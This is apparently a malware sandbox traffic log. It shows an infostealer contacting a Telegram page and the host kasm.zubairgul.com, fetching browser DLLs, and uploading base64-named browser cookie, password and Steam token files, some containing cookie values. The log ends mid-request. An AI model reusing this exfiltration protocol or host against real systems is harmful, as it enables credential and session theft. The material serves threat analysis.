02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 74 1c 00 00 00 70 08 00 00 1e 00 00 00 3e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 d8 03 00 00 00 90 08 00 00 04 00 00 00 5c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: GET /maslengdsa HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHDBAAFIDGDAAAAAAAAHost: kasm.zubairgul.comContent-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 34 46 36 41 46 31 39 36 30 41 31 36 33 33 30 34 37 39 38 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 2d 2d 0d 0a Data Ascii: ------IEHDBAAFIDGDAAAAAAAAContent-Disposition: form-data; name="hwid"8E4F6AF1960A1633047986-a33c7340-61ca------IEHDBAAFIDGDAAAAAAAAContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------IEHDBAAFIDGDAAAAAAAA--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEGCBAAFHDHDHJKEGCFCHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 47 43 42 41 41 46 48 44 48 44 48 4a 4b 45 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 41 41 46 48 44 48 44 48 4a 4b 45 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 41 41 46 48 44 48 44 48 4a 4b 45 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 41 41 46 48 44 48 44 48 4a 4b 45 47 43 46 43 2d 2d 0d 0a Data Ascii: ------IEGCBAAFHDHDHJKEGCFCContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------IEGCBAAFHDHDHJKEGCFCContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------IEGCBAAFHDHDHJKEGCFCContent-Disposition: form-data; name="mode"1------IEGCBAAFHDHDHJKEGCFC--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBAECBAEGDGDHIEHIJJHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 2d 2d 0d 0a Data Ascii: ------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="mode"2------KFBAECBAEGDGDHIEHIJJ--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFIJJEGHDAEBGCAKJKFHost: kasm.zubairgul.comContent-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 2d 2d 0d 0a Data Ascii: ------BKFIJJEGHDAEBGCAKJKFContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------BKFIJJEGHDAEBGCAKJKFContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------BKFIJJEGHDAEBGCAKJKFContent-Disposition: form-data; name="mode"21------BKFIJJEGHDAEBGCAKJKF--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFIJEGIDBGIECAKKEGDHost: kasm.zubairgul.comContent-Length: 6921Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHIHost: kasm.zubairgul.comContent-Length: 829Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 51 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="file_name"Q29
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKJKJJJECFIEBFHIEGHost: kasm.zubairgul.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 4a 4b 4a 4a 4a 45 43 46 49 45 42 46 48 49 45 47 2d 2d 0d 0a Data Ascii: ------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------CBAKJKJJJECFIEBFHIEGContent-Disposition: form-data; name="file_data"------CBAKJKJJJECFIEBFHIEG--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIJJEGDBFIIDGCAKJEBHost: kasm.zubairgul.comContent-Length: 437Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 47 46 7a 63 33 64 76 63 6d 52 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 2d 2d 0d 0a Data Ascii: ------GHIJJEGDBFIIDGCAKJEBContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------GHIJJEGDBFIIDGCAKJEBContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------GHIJJEGDBFIIDGCAKJEBContent-Disposition: form-data; name="file_name"cGFzc3dvcmRzLnR4dA==------GHIJJEGDBFIIDGCAKJEBContent-Disposition: form-data; name="file_data"------GHIJJEGDBFIIDGCAKJEB--
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: kasm.zubairgul.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIJEBAECGCBKECAAAEBHost: kasm.zubairgul.comContent-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAKECAEGDHIECBGHIIHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 33 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 2d 2d 0d 0a Data Ascii: ------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="mode"3------AECAKECAEGDHIECBGHII--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFHCFBGIIJKFHJDHDHHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 34 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 2d 2d 0d 0a Data Ascii: ------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="mode"4------DBKFHCFBGIIJKFHJDHDH--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFBAAFCGIEGDHIEBFIIHost: kasm.zubairgul.comContent-Length: 461Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 42 41 41 46 43 47 49 45 47 44 48 49 45 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 42 41 41 46 43 47 49 45 47 44 48 49 45 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 63 63 39 63 37 65 61 65 62 66 64 66 32 61 38 63 63 30 35 38 36 64 37 34 31 39 64 36 65 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 42 41 41 46 43 47 49 45 47 44 48 49 45 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 55 32 39 6d 64 46 78 54 64 47 56 68 62 56 78 7a 64 47 56 68 62 56 39 30 62 32 74 6c 62 6e 4d 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 42 41 41 46 43 47 49 45 47 44 48 49 45 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 46 79 54 6d 39 51 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 42 41 41 46 43 47 49 45 47 44 48 49 45 42 46 49 49 2d 2d 0d 0a Data Ascii: ------KKFBAAFCGIEGDHIEBFIIContent-Disposition: form-data; name="token"95787170bd8bd7ecb7c5c39b1938e9cc------KKFBAAFCGIEGDHIEBFIIContent-Disposition: form-data; name="build_id"8ecc9c7eaebfdf2a8cc0586d7419d6ea------KKFBAAFCGIEGDHIEBFIIContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------KKFBAAFCGIEGDHIEBFIIContent-Disposition: form-data; name="file_data"FyTm9Q==------KKFBAAFCGIEGDHIEBFII--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFIHost: kasm.zubairgul.comContent-Length: 114233Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJJKFCGDGHDHIECGCBKHost: kasm.zubairgul.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 37 38 37 31 37 30 62 64 38 62 64 37 65 63 62 37 63 35 63 33 39 62 31 39 33 38 65 39 63 63 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 